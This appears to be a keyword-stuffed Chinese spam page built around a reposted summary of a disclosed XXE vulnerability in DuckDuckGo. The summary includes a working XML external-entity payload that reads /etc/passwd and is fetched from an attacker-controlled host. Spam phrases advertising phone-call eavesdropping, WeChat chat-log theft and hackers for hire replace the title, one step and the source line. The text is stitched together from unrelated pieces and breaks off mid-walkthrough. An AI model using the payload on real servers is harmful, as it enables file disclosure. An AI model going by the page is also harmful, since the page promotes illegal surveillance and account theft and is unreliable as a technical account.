窃听别人手机的通话_窃听别人微信聊天记录
近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。
DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。
漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。
只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。
而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。
具体步骤如下
1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。
<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>
窃听别人手机的通话_窃听别人微信聊天记录
2.窃听别人手机的通话_窃听别人微信聊天记录
3.返回的页面可以看到xm l文件解析结果
在确认了漏洞后,DuckDuckGo工作人员也对其表示了感谢。
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:窃听别人手机的通话_窃听别人微信聊天记录
白帽汇从事信息安全,专注于安全大数据、企业威胁情报。
公司产品:FOFA- *** 空间安全搜索引擎、FOEYE- *** 空间检索系统、NOSEC-安全讯息平台。
为您提供: *** 空间测绘、企业资产收集、企业威胁情报、应急响应服务
盗微信号简单吗?怎样简单盗微信号?移动互联网时代即将过去,并迎来一个新时代,即人工智能时代。人工智能已经逐渐占据了传统的移动互联网市场,移动互联网时代最终将成为过去。人工智能时代属于开发者时代,开放可...
现在在这种互联网时代也是出现了很多不计其数的网红,有些人往往是拥有着数不胜数的粉丝,而且只要是说一句话几乎就是一呼百应。很多网红之所以能够得到这样的机会,就是因为他们曾经凭借过一部作品,顺利的进入...
揭秘黑客教程:窃取微信账户密码的最简单的方法和工具; 24小时接单的黑客 1.停牌一个月后,如何恢复另一边的平静?脱离是每一个想要拯救它的人的一种痛苦。在这段时间里,有些人坚持想错过,完成自己的转...
说起谈天软件,最火的便是QQ和微信了,尽管现在QQ逐步在渐渐被微信所替代,但却替代不了咱们那时分的回忆。还记得曾经在没有微信的时分,QQ是一个很火的谈天软件,最让人无法忘掉的便是最初的那个画面一只小企...
1,网络原因引起的不能加QQ好友故障,这些情况你只需要等网络比较好的时候,重新添加就可以了 如果出现网络引起的原因就会提示““连接超时”、“正在发送验证信息”、“拉取验证码失败”、“读取...
你还记得SimJacker吗? 攻击者可利用其对十亿手机进行监控的漏洞。 它还没走,又叫来了它的兄弟。 WIBattack来了 据研究人员警告,SimJacker的最新变种名为WIBattac...